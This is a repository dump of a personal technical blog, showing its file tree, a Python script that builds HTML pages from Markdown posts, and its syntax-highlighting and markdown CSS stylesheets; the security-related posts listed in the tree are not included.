├── .gitignore
├── README.md
├── build.py
├── css
    ├── code.css
    └── markdown.css
├── index.html
├── posts
    ├── 2013-03-08-wpa2-vulnerability-tplink
    │   ├── _main.md
    │   └── index.html
    ├── 2013-03-30-virtualdj-73-buffer-overflow
    │   ├── _main.md
    │   └── index.html
    ├── 2013-03-31-wpa2-vulnerability-linksys-dlink
    │   ├── _main.md
    │   └── index.html
    ├── 2013-04-20-virtualdj-74-buffer-overflow
    │   ├── _main.md
    │   └── index.html
    ├── 2016-03-16-ps3-gpu-exploit
    │   ├── _main.md
    │   └── index.html
    ├── 2016-08-22-observations
    │   ├── _main.md
    │   └── index.html
    ├── 2016-09-14-jit-compiled-maps
    │   ├── _main.md
    │   └── index.html
    ├── 2016-10-12-xchg-rax-rax-solutions
    │   ├── _main.md
    │   ├── index.html
    │   ├── xorpd_0x3c_hilbert.png
    │   ├── xorpd_0x3c_hilbert.py
    │   ├── xorpd_0x3d_morton.png
    │   ├── xorpd_0x3d_morton.py
    │   └── xorpd_0x3f_hanoi.png
    ├── 2017-07-19-googlectf-2017-moon
    │   ├── _main.md
    │   ├── _main.pdf
    │   ├── apitrace.png
    │   ├── bruteforcer.py
    │   ├── ida.png
    │   ├── index.html
    │   ├── latex-1.png
    │   ├── latex-2.png
    │   ├── moon.glsl
    │   └── moon.zip
    ├── 2018-04-18-lle-vs-hle
    │   ├── _main.md
    │   └── index.html
    ├── 2019-02-16-cell-miner-alu
    │   ├── _main.md
    │   ├── arithmetic.s
    │   └── index.html
    └── 2024-04-28-quotes
    │   └── _main.md
├── requirements.txt
└── templates
    ├── index.html
    └── post.html


/.gitignore:
--------------------------------------------------------------------------------
1 | *.ffs_db
2 | debug.log
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Blog
2 | ====
3 | 
4 | Articles and resources for my blog, written in Markdown.
5 | 
6 | Licensed under [Creative Commons Attribution-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-sa/4.0/).
7 | 


--------------------------------------------------------------------------------
/build.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | 
 3 | import os
 4 | 
 5 | import markdown
 6 | import pygments
 7 | 
 8 | # Globals
 9 | index = []
10 | 
11 | # Markdown
12 | md = markdown.Markdown(
13 |     encoding='utf=8',
14 |     output_format='html5',
15 |     extensions=[
16 |         'markdown.extensions.codehilite',
17 |         'markdown.extensions.fenced_code',
18 |         'markdown.extensions.meta',
19 |         'markdown.extensions.tables',
20 |         'markdown.extensions.toc',
21 |     ])
22 | 
23 | # Build
def build_post_markdown(source, target):
    """Render one Markdown post to HTML and record it for the index.

    Reads ``source``, converts it with the shared ``md`` converter, fills
    the ``$date``, ``$title``, ``$author`` and ``$content`` placeholders of
    ``templates/post.html`` and writes the result to ``target``.  The
    post's metadata (``link`` plus the first value of every key found in
    ``md.Meta``) is appended to the global ``index``.

    Args:
        source: Path of the Markdown file to read.
        target: Path of the HTML file to write; also stored as ``link``.

    Raises:
        KeyError: If the post lacks ``date``, ``title`` or ``author``
            metadata.
    """
    # The generated pages declare charset utf-8, so read and write UTF-8
    # explicitly instead of relying on the platform's default encoding.
    with open(source, 'r', encoding='utf-8') as f:
        text = f.read()

    # The converter is shared between posts; reset() discards any state
    # left over from the previously converted document.
    content = md.reset().convert(text)

    metadata = {'link': target}
    for key, values in md.Meta.items():
        # Each metadata key maps to a list of lines; only the first is used.
        metadata[key] = values[0]

    # Fail early, naming the offending file, before touching the index.
    missing = [k for k in ('date', 'title', 'author') if k not in metadata]
    if missing:
        raise KeyError('%s: missing metadata: %s'
                       % (source, ', '.join(missing)))
    index.append(metadata)

    with open('templates/post.html', 'r', encoding='utf-8') as f:
        post = f.read()
    # $content is substituted last so placeholders inside the rendered
    # article body are never expanded.
    post = post.replace('$date', metadata['date'])
    post = post.replace('$title', metadata['title'])
    post = post.replace('$author', metadata['author'])
    post = post.replace('$content', content)

    with open(target, 'w', encoding='utf-8') as f:
        f.write('<!-- This file has been auto-generated! -->\n')
        f.write(post)
42 | 
def build_post(path):
    """Build the post in directory ``path`` if it contains ``_main.md``.

    The rendered page is written to ``index.html`` in the same directory.
    Directories without a ``_main.md`` file are silently skipped.
    """
    markdown_file = os.path.join(path, '_main.md')
    if not os.path.isfile(markdown_file):
        return
    html_file = os.path.join(path, 'index.html')
    print('Building: %s' % markdown_file)
    build_post_markdown(markdown_file, html_file)
49 | 
def build_index(target):
    """Write the index page listing every post recorded in ``index``.

    Posts are listed in reverse build order, one table row per post with
    its date and a link to its directory.  The table replaces the
    ``$posts`` placeholder of ``templates/index.html`` and the result is
    written to ``target``.

    Args:
        target: Path of the HTML file to write.
    """
    # Header cells must live inside a <tr>; bare <td> children of <thead>
    # are invalid HTML that browsers only repair implicitly.
    header = ('<thead><tr><td><b>Date</b></td>'
              '<td><b>Article</b></td></tr></thead>')
    rows = []
    for post in reversed(index):
        # Link to the post directory rather than to its index.html.
        link = post['link'].replace('index.html', '')
        rows.append('<tr><td>%s</td><td><a href="%s">%s</a></td></tr>' % (
            post['date'], link, post['title']))
    posts = '<table>%s</table>' % (header + ''.join(rows))

    # The generated pages declare charset utf-8, so do not depend on the
    # platform's default encoding.
    with open('templates/index.html', 'r', encoding='utf-8') as f:
        html = f.read()
    html = html.replace('$posts', posts)
    with open(target, 'w', encoding='utf-8') as f:
        f.write('<!-- This file has been auto-generated! -->\n')
        f.write(html)
63 | 
def build_all():
    """Build every post under ``posts/`` and then the site index."""
    # Create posts
    posts = 'posts'
    # os.listdir() returns entries in arbitrary order.  Post directories
    # are named with a date prefix, so sorting the names makes the build
    # order chronological and lets build_index() list newest posts first.
    for name in sorted(os.listdir(posts)):
        build_post(os.path.join(posts, name))
    # Create index
    build_index('index.html')
72 | 
def main():
    """Script entry point: rebuild all posts and the index page."""
    build_all()


if __name__ == '__main__':
    main()
79 | 


--------------------------------------------------------------------------------
/css/code.css:
--------------------------------------------------------------------------------
 1 | .codehilite .hll { background-color: #ffffcc }
 2 | .codehilite  { background: #f8f8f8; }
 3 | .codehilite .c { color: #408080; font-style: italic } /* Comment */
 4 | .codehilite .err { border: 0px solid #FF0000 } /* Error */
 5 | .codehilite .k { color: #008000; font-weight: bold } /* Keyword */
 6 | .codehilite .o { color: #666666 } /* Operator */
 7 | .codehilite .ch { color: #408080; font-style: italic } /* Comment.Hashbang */
 8 | .codehilite .cm { color: #408080; font-style: italic } /* Comment.Multiline */
 9 | .codehilite .cp { color: #BC7A00 } /* Comment.Preproc */
10 | .codehilite .cpf { color: #408080; font-style: italic } /* Comment.PreprocFile */
11 | .codehilite .c1 { color: #408080; font-style: italic } /* Comment.Single */
12 | .codehilite .cs { color: #408080; font-style: italic } /* Comment.Special */
13 | .codehilite .gd { color: #A00000 } /* Generic.Deleted */
14 | .codehilite .ge { font-style: italic } /* Generic.Emph */
15 | .codehilite .gr { color: #FF0000 } /* Generic.Error */
16 | .codehilite .gh { color: #000080; font-weight: bold } /* Generic.Heading */
17 | .codehilite .gi { color: #00A000 } /* Generic.Inserted */
18 | .codehilite .go { color: #888888 } /* Generic.Output */
19 | .codehilite .gp { color: #000080; font-weight: bold } /* Generic.Prompt */
20 | .codehilite .gs { font-weight: bold } /* Generic.Strong */
21 | .codehilite .gu { color: #800080; font-weight: bold } /* Generic.Subheading */
22 | .codehilite .gt { color: #0044DD } /* Generic.Traceback */
23 | .codehilite .kc { color: #008000; font-weight: bold } /* Keyword.Constant */
24 | .codehilite .kd { color: #008000; font-weight: bold } /* Keyword.Declaration */
25 | .codehilite .kn { color: #008000; font-weight: bold } /* Keyword.Namespace */
26 | .codehilite .kp { color: #008000 } /* Keyword.Pseudo */
27 | .codehilite .kr { color: #008000; font-weight: bold } /* Keyword.Reserved */
28 | .codehilite .kt { color: #B00040 } /* Keyword.Type */
29 | .codehilite .m { color: #666666 } /* Literal.Number */
30 | .codehilite .s { color: #BA2121 } /* Literal.String */
31 | .codehilite .na { color: #7D9029 } /* Name.Attribute */
32 | .codehilite .nb { color: #008000 } /* Name.Builtin */
33 | .codehilite .nc { color: #0000FF; font-weight: bold } /* Name.Class */
34 | .codehilite .no { color: #880000 } /* Name.Constant */
35 | .codehilite .nd { color: #AA22FF } /* Name.Decorator */
36 | .codehilite .ni { color: #999999; font-weight: bold } /* Name.Entity */
37 | .codehilite .ne { color: #D2413A; font-weight: bold } /* Name.Exception */
38 | .codehilite .nf { color: #0000FF } /* Name.Function */
39 | .codehilite .nl { color: #A0A000 } /* Name.Label */
40 | .codehilite .nn { color: #0000FF; font-weight: bold } /* Name.Namespace */
41 | .codehilite .nt { color: #008000; font-weight: bold } /* Name.Tag */
42 | .codehilite .nv { color: #19177C } /* Name.Variable */
43 | .codehilite .ow { color: #AA22FF; font-weight: bold } /* Operator.Word */
44 | .codehilite .w { color: #bbbbbb } /* Text.Whitespace */
45 | .codehilite .mb { color: #666666 } /* Literal.Number.Bin */
46 | .codehilite .mf { color: #666666 } /* Literal.Number.Float */
47 | .codehilite .mh { color: #666666 } /* Literal.Number.Hex */
48 | .codehilite .mi { color: #666666 } /* Literal.Number.Integer */
49 | .codehilite .mo { color: #666666 } /* Literal.Number.Oct */
50 | .codehilite .sa { color: #BA2121 } /* Literal.String.Affix */
51 | .codehilite .sb { color: #BA2121 } /* Literal.String.Backtick */
52 | .codehilite .sc { color: #BA2121 } /* Literal.String.Char */
53 | .codehilite .dl { color: #BA2121 } /* Literal.String.Delimiter */
54 | .codehilite .sd { color: #BA2121; font-style: italic } /* Literal.String.Doc */
55 | .codehilite .s2 { color: #BA2121 } /* Literal.String.Double */
56 | .codehilite .se { color: #BB6622; font-weight: bold } /* Literal.String.Escape */
57 | .codehilite .sh { color: #BA2121 } /* Literal.String.Heredoc */
58 | .codehilite .si { color: #BB6688; font-weight: bold } /* Literal.String.Interpol */
59 | .codehilite .sx { color: #008000 } /* Literal.String.Other */
60 | .codehilite .sr { color: #BB6688 } /* Literal.String.Regex */
61 | .codehilite .s1 { color: #BA2121 } /* Literal.String.Single */
62 | .codehilite .ss { color: #19177C } /* Literal.String.Symbol */
63 | .codehilite .bp { color: #008000 } /* Name.Builtin.Pseudo */
64 | .codehilite .fm { color: #0000FF } /* Name.Function.Magic */
65 | .codehilite .vc { color: #19177C } /* Name.Variable.Class */
66 | .codehilite .vg { color: #19177C } /* Name.Variable.Global */
67 | .codehilite .vi { color: #19177C } /* Name.Variable.Instance */
68 | .codehilite .vm { color: #19177C } /* Name.Variable.Magic */
69 | .codehilite .il { color: #666666 } /* Literal.Number.Integer.Long */
70 | 


--------------------------------------------------------------------------------
/css/markdown.css:
--------------------------------------------------------------------------------
  1 | @font-face {
  2 |   font-family: octicons-link;
  3 |   src: url(data:font/woff;charset=utf-8;base64,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) format('woff');
  4 | }
  5 | 
  6 | .markdown-body .octicon {
  7 |   display: inline-block;
  8 |   fill: currentColor;
  9 |   vertical-align: text-bottom;
 10 | }
 11 | 
 12 | .markdown-body .anchor {
 13 |   float: left;
 14 |   line-height: 1;
 15 |   margin-left: -20px;
 16 |   padding-right: 4px;
 17 | }
 18 | 
 19 | .markdown-body .anchor:focus {
 20 |   outline: none;
 21 | }
 22 | 
 23 | .markdown-body h1 .octicon-link,
 24 | .markdown-body h2 .octicon-link,
 25 | .markdown-body h3 .octicon-link,
 26 | .markdown-body h4 .octicon-link,
 27 | .markdown-body h5 .octicon-link,
 28 | .markdown-body h6 .octicon-link {
 29 |   color: #1b1f23;
 30 |   vertical-align: middle;
 31 |   visibility: hidden;
 32 | }
 33 | 
 34 | .markdown-body h1:hover .anchor,
 35 | .markdown-body h2:hover .anchor,
 36 | .markdown-body h3:hover .anchor,
 37 | .markdown-body h4:hover .anchor,
 38 | .markdown-body h5:hover .anchor,
 39 | .markdown-body h6:hover .anchor {
 40 |   text-decoration: none;
 41 | }
 42 | 
 43 | .markdown-body h1:hover .anchor .octicon-link,
 44 | .markdown-body h2:hover .anchor .octicon-link,
 45 | .markdown-body h3:hover .anchor .octicon-link,
 46 | .markdown-body h4:hover .anchor .octicon-link,
 47 | .markdown-body h5:hover .anchor .octicon-link,
 48 | .markdown-body h6:hover .anchor .octicon-link {
 49 |   visibility: visible;
 50 | }
 51 | 
 52 | .markdown-body {
 53 |   -ms-text-size-adjust: 100%;
 54 |   -webkit-text-size-adjust: 100%;
 55 |   color: #24292e;
 56 |   line-height: 1.5;
 57 |   font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Helvetica,Arial,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol;
 58 |   font-size: 16px;
 59 |   line-height: 1.5;
 60 |   word-wrap: break-word;
 61 | }
 62 | 
 63 | .markdown-body .pl-c {
 64 |   color: #6a737d;
 65 | }
 66 | 
 67 | .markdown-body .pl-c1,
 68 | .markdown-body .pl-s .pl-v {
 69 |   color: #005cc5;
 70 | }
 71 | 
 72 | .markdown-body .pl-e,
 73 | .markdown-body .pl-en {
 74 |   color: #6f42c1;
 75 | }
 76 | 
 77 | .markdown-body .pl-s .pl-s1,
 78 | .markdown-body .pl-smi {
 79 |   color: #24292e;
 80 | }
 81 | 
 82 | .markdown-body .pl-ent {
 83 |   color: #22863a;
 84 | }
 85 | 
 86 | .markdown-body .pl-k {
 87 |   color: #d73a49;
 88 | }
 89 | 
 90 | .markdown-body .pl-pds,
 91 | .markdown-body .pl-s,
 92 | .markdown-body .pl-s .pl-pse .pl-s1,
 93 | .markdown-body .pl-sr,
 94 | .markdown-body .pl-sr .pl-cce,
 95 | .markdown-body .pl-sr .pl-sra,
 96 | .markdown-body .pl-sr .pl-sre {
 97 |   color: #032f62;
 98 | }
 99 | 
100 | .markdown-body .pl-smw,
101 | .markdown-body .pl-v {
102 |   color: #e36209;
103 | }
104 | 
105 | .markdown-body .pl-bu {
106 |   color: #b31d28;
107 | }
108 | 
109 | .markdown-body .pl-ii {
110 |   background-color: #b31d28;
111 |   color: #fafbfc;
112 | }
113 | 
114 | .markdown-body .pl-c2 {
115 |   background-color: #d73a49;
116 |   color: #fafbfc;
117 | }
118 | 
119 | .markdown-body .pl-c2:before {
120 |   content: "^M";
121 | }
122 | 
123 | .markdown-body .pl-sr .pl-cce {
124 |   color: #22863a;
125 |   font-weight: 700;
126 | }
127 | 
128 | .markdown-body .pl-ml {
129 |   color: #735c0f;
130 | }
131 | 
132 | .markdown-body .pl-mh,
133 | .markdown-body .pl-mh .pl-en,
134 | .markdown-body .pl-ms {
135 |   color: #005cc5;
136 |   font-weight: 700;
137 | }
138 | 
139 | .markdown-body .pl-mi {
140 |   color: #24292e;
141 |   font-style: italic;
142 | }
143 | 
144 | .markdown-body .pl-mb {
145 |   color: #24292e;
146 |   font-weight: 700;
147 | }
148 | 
149 | .markdown-body .pl-md {
150 |   background-color: #ffeef0;
151 |   color: #b31d28;
152 | }
153 | 
154 | .markdown-body .pl-mi1 {
155 |   background-color: #f0fff4;
156 |   color: #22863a;
157 | }
158 | 
159 | .markdown-body .pl-mc {
160 |   background-color: #ffebda;
161 |   color: #e36209;
162 | }
163 | 
164 | .markdown-body .pl-mi2 {
165 |   background-color: #005cc5;
166 |   color: #f6f8fa;
167 | }
168 | 
169 | .markdown-body .pl-mdr {
170 |   color: #6f42c1;
171 |   font-weight: 700;
172 | }
173 | 
174 | .markdown-body .pl-ba {
175 |   color: #586069;
176 | }
177 | 
178 | .markdown-body .pl-sg {
179 |   color: #959da5;
180 | }
181 | 
182 | .markdown-body .pl-corl {
183 |   color: #032f62;
184 |   text-decoration: underline;
185 | }
186 | 
187 | .markdown-body details {
188 |   display: block;
189 | }
190 | 
191 | .markdown-body summary {
192 |   display: list-item;
193 | }
194 | 
195 | .markdown-body a {
196 |   background-color: transparent;
197 | }
198 | 
199 | .markdown-body a:active,
200 | .markdown-body a:hover {
201 |   outline-width: 0;
202 | }
203 | 
204 | .markdown-body strong {
205 |   font-weight: inherit;
206 |   font-weight: bolder;
207 | }
208 | 
209 | .markdown-body h1 {
210 |   font-size: 2em;
211 |   margin: .67em 0;
212 | }
213 | 
214 | .markdown-body img {
215 |   border-style: none;
216 | }
217 | 
218 | .markdown-body code,
219 | .markdown-body kbd,
220 | .markdown-body pre {
221 |   font-family: monospace,monospace;
222 |   font-size: 1em;
223 | }
224 | 
225 | .markdown-body hr {
226 |   box-sizing: content-box;
227 |   height: 0;
228 |   overflow: visible;
229 | }
230 | 
231 | .markdown-body input {
232 |   font: inherit;
233 |   margin: 0;
234 | }
235 | 
236 | .markdown-body input {
237 |   overflow: visible;
238 | }
239 | 
240 | .markdown-body [type=checkbox] {
241 |   box-sizing: border-box;
242 |   padding: 0;
243 | }
244 | 
245 | .markdown-body * {
246 |   box-sizing: border-box;
247 | }
248 | 
249 | .markdown-body input {
250 |   font-family: inherit;
251 |   font-size: inherit;
252 |   line-height: inherit;
253 | }
254 | 
255 | .markdown-body a {
256 |   color: #0366d6;
257 |   text-decoration: none;
258 | }
259 | 
260 | .markdown-body a:hover {
261 |   text-decoration: underline;
262 | }
263 | 
264 | .markdown-body strong {
265 |   font-weight: 600;
266 | }
267 | 
268 | .markdown-body hr {
269 |   background: transparent;
270 |   border: 0;
271 |   border-bottom: 1px solid #dfe2e5;
272 |   height: 0;
273 |   margin: 15px 0;
274 |   overflow: hidden;
275 | }
276 | 
277 | .markdown-body hr:before {
278 |   content: "";
279 |   display: table;
280 | }
281 | 
282 | .markdown-body hr:after {
283 |   clear: both;
284 |   content: "";
285 |   display: table;
286 | }
287 | 
288 | .markdown-body table {
289 |   border-collapse: collapse;
290 |   border-spacing: 0;
291 | }
292 | 
293 | .markdown-body td,
294 | .markdown-body th {
295 |   padding: 0;
296 | }
297 | 
298 | .markdown-body details summary {
299 |   cursor: pointer;
300 | }
301 | 
302 | .markdown-body h1,
303 | .markdown-body h2,
304 | .markdown-body h3,
305 | .markdown-body h4,
306 | .markdown-body h5,
307 | .markdown-body h6 {
308 |   margin-bottom: 0;
309 |   margin-top: 0;
310 | }
311 | 
312 | .markdown-body h1 {
313 |   font-size: 32px;
314 | }
315 | 
316 | .markdown-body h1,
317 | .markdown-body h2 {
318 |   font-weight: 600;
319 | }
320 | 
321 | .markdown-body h2 {
322 |   font-size: 24px;
323 | }
324 | 
325 | .markdown-body h3 {
326 |   font-size: 20px;
327 | }
328 | 
329 | .markdown-body h3,
330 | .markdown-body h4 {
331 |   font-weight: 600;
332 | }
333 | 
334 | .markdown-body h4 {
335 |   font-size: 16px;
336 | }
337 | 
338 | .markdown-body h5 {
339 |   font-size: 14px;
340 | }
341 | 
342 | .markdown-body h5,
343 | .markdown-body h6 {
344 |   font-weight: 600;
345 | }
346 | 
347 | .markdown-body h6 {
348 |   font-size: 12px;
349 | }
350 | 
351 | .markdown-body p {
352 |   margin-bottom: 10px;
353 |   margin-top: 0;
354 | }
355 | 
356 | .markdown-body blockquote {
357 |   margin: 0;
358 | }
359 | 
360 | .markdown-body ol,
361 | .markdown-body ul {
362 |   margin-bottom: 0;
363 |   margin-top: 0;
364 |   padding-left: 0;
365 | }
366 | 
367 | .markdown-body ol ol,
368 | .markdown-body ul ol {
369 |   list-style-type: lower-roman;
370 | }
371 | 
372 | .markdown-body ol ol ol,
373 | .markdown-body ol ul ol,
374 | .markdown-body ul ol ol,
375 | .markdown-body ul ul ol {
376 |   list-style-type: lower-alpha;
377 | }
378 | 
379 | .markdown-body dd {
380 |   margin-left: 0;
381 | }
382 | 
383 | .markdown-body code,
384 | .markdown-body pre {
385 |   font-family: SFMono-Regular,Consolas,Liberation Mono,Menlo,Courier,monospace;
386 |   font-size: 12px;
387 | }
388 | 
389 | .markdown-body pre {
390 |   margin-bottom: 0;
391 |   margin-top: 0;
392 | }
393 | 
394 | .markdown-body input::-webkit-inner-spin-button,
395 | .markdown-body input::-webkit-outer-spin-button {
396 |   -webkit-appearance: none;
397 |   appearance: none;
398 |   margin: 0;
399 | }
400 | 
401 | .markdown-body .border {
402 |   border: 1px solid #e1e4e8!important;
403 | }
404 | 
405 | .markdown-body .border-0 {
406 |   border: 0!important;
407 | }
408 | 
409 | .markdown-body .border-bottom {
410 |   border-bottom: 1px solid #e1e4e8!important;
411 | }
412 | 
413 | .markdown-body .rounded-1 {
414 |   border-radius: 3px!important;
415 | }
416 | 
417 | .markdown-body .bg-white {
418 |   background-color: #fff!important;
419 | }
420 | 
421 | .markdown-body .bg-gray-light {
422 |   background-color: #fafbfc!important;
423 | }
424 | 
425 | .markdown-body .text-gray-light {
426 |   color: #6a737d!important;
427 | }
428 | 
429 | .markdown-body .mb-0 {
430 |   margin-bottom: 0!important;
431 | }
432 | 
433 | .markdown-body .my-2 {
434 |   margin-bottom: 8px!important;
435 |   margin-top: 8px!important;
436 | }
437 | 
438 | .markdown-body .pl-0 {
439 |   padding-left: 0!important;
440 | }
441 | 
442 | .markdown-body .py-0 {
443 |   padding-bottom: 0!important;
444 |   padding-top: 0!important;
445 | }
446 | 
447 | .markdown-body .pl-1 {
448 |   padding-left: 4px!important;
449 | }
450 | 
451 | .markdown-body .pl-2 {
452 |   padding-left: 8px!important;
453 | }
454 | 
455 | .markdown-body .py-2 {
456 |   padding-bottom: 8px!important;
457 |   padding-top: 8px!important;
458 | }
459 | 
460 | .markdown-body .pl-3,
461 | .markdown-body .px-3 {
462 |   padding-left: 16px!important;
463 | }
464 | 
465 | .markdown-body .px-3 {
466 |   padding-right: 16px!important;
467 | }
468 | 
469 | .markdown-body .pl-4 {
470 |   padding-left: 24px!important;
471 | }
472 | 
473 | .markdown-body .pl-5 {
474 |   padding-left: 32px!important;
475 | }
476 | 
477 | .markdown-body .pl-6 {
478 |   padding-left: 40px!important;
479 | }
480 | 
481 | .markdown-body .f6 {
482 |   font-size: 12px!important;
483 | }
484 | 
485 | .markdown-body .lh-condensed {
486 |   line-height: 1.25!important;
487 | }
488 | 
489 | .markdown-body .text-bold {
490 |   font-weight: 600!important;
491 | }
492 | 
493 | .markdown-body:before {
494 |   content: "";
495 |   display: table;
496 | }
497 | 
498 | .markdown-body:after {
499 |   clear: both;
500 |   content: "";
501 |   display: table;
502 | }
503 | 
504 | .markdown-body>:first-child {
505 |   margin-top: 0!important;
506 | }
507 | 
508 | .markdown-body>:last-child {
509 |   margin-bottom: 0!important;
510 | }
511 | 
512 | .markdown-body a:not([href]) {
513 |   color: inherit;
514 |   text-decoration: none;
515 | }
516 | 
517 | .markdown-body blockquote,
518 | .markdown-body dl,
519 | .markdown-body ol,
520 | .markdown-body p,
521 | .markdown-body pre,
522 | .markdown-body table,
523 | .markdown-body ul {
524 |   margin-bottom: 16px;
525 |   margin-top: 0;
526 | }
527 | 
528 | .markdown-body hr {
529 |   background-color: #e1e4e8;
530 |   border: 0;
531 |   height: .25em;
532 |   margin: 24px 0;
533 |   padding: 0;
534 | }
535 | 
536 | .markdown-body blockquote {
537 |   border-left: .25em solid #dfe2e5;
538 |   color: #6a737d;
539 |   padding: 0 1em;
540 | }
541 | 
542 | .markdown-body blockquote>:first-child {
543 |   margin-top: 0;
544 | }
545 | 
546 | .markdown-body blockquote>:last-child {
547 |   margin-bottom: 0;
548 | }
549 | 
550 | .markdown-body kbd {
551 |   background-color: #fafbfc;
552 |   border: 1px solid #c6cbd1;
553 |   border-bottom-color: #959da5;
554 |   border-radius: 3px;
555 |   box-shadow: inset 0 -1px 0 #959da5;
556 |   color: #444d56;
557 |   display: inline-block;
558 |   font-size: 11px;
559 |   line-height: 10px;
560 |   padding: 3px 5px;
561 |   vertical-align: middle;
562 | }
563 | 
564 | .markdown-body h1,
565 | .markdown-body h2,
566 | .markdown-body h3,
567 | .markdown-body h4,
568 | .markdown-body h5,
569 | .markdown-body h6 {
570 |   font-weight: 600;
571 |   line-height: 1.25;
572 |   margin-bottom: 16px;
573 |   margin-top: 24px;
574 | }
575 | 
576 | .markdown-body h1 {
577 |   font-size: 2em;
578 | }
579 | 
580 | .markdown-body h1,
581 | .markdown-body h2 {
582 |   border-bottom: 1px solid #eaecef;
583 |   padding-bottom: .3em;
584 | }
585 | 
586 | .markdown-body h2 {
587 |   font-size: 1.5em;
588 | }
589 | 
590 | .markdown-body h3 {
591 |   font-size: 1.25em;
592 | }
593 | 
594 | .markdown-body h4 {
595 |   font-size: 1em;
596 | }
597 | 
598 | .markdown-body h5 {
599 |   font-size: .875em;
600 | }
601 | 
602 | .markdown-body h6 {
603 |   color: #6a737d;
604 |   font-size: .85em;
605 | }
606 | 
607 | .markdown-body ol,
608 | .markdown-body ul {
609 |   padding-left: 2em;
610 | }
611 | 
612 | .markdown-body ol ol,
613 | .markdown-body ol ul,
614 | .markdown-body ul ol,
615 | .markdown-body ul ul {
616 |   margin-bottom: 0;
617 |   margin-top: 0;
618 | }
619 | 
620 | .markdown-body li {
621 |   word-wrap: break-all;
622 | }
623 | 
624 | .markdown-body li>p {
625 |   margin-top: 16px;
626 | }
627 | 
628 | .markdown-body li+li {
629 |   margin-top: .25em;
630 | }
631 | 
632 | .markdown-body dl {
633 |   padding: 0;
634 | }
635 | 
636 | .markdown-body dl dt {
637 |   font-size: 1em;
638 |   font-style: italic;
639 |   font-weight: 600;
640 |   margin-top: 16px;
641 |   padding: 0;
642 | }
643 | 
644 | .markdown-body dl dd {
645 |   margin-bottom: 16px;
646 |   padding: 0 16px;
647 | }
648 | 
649 | .markdown-body table {
650 |   display: block;
651 |   overflow: auto;
652 |   width: 100%;
653 | }
654 | 
655 | .markdown-body table th {
656 |   font-weight: 600;
657 | }
658 | 
659 | .markdown-body table td,
660 | .markdown-body table th {
661 |   border: 1px solid #dfe2e5;
662 |   padding: 6px 13px;
663 | }
664 | 
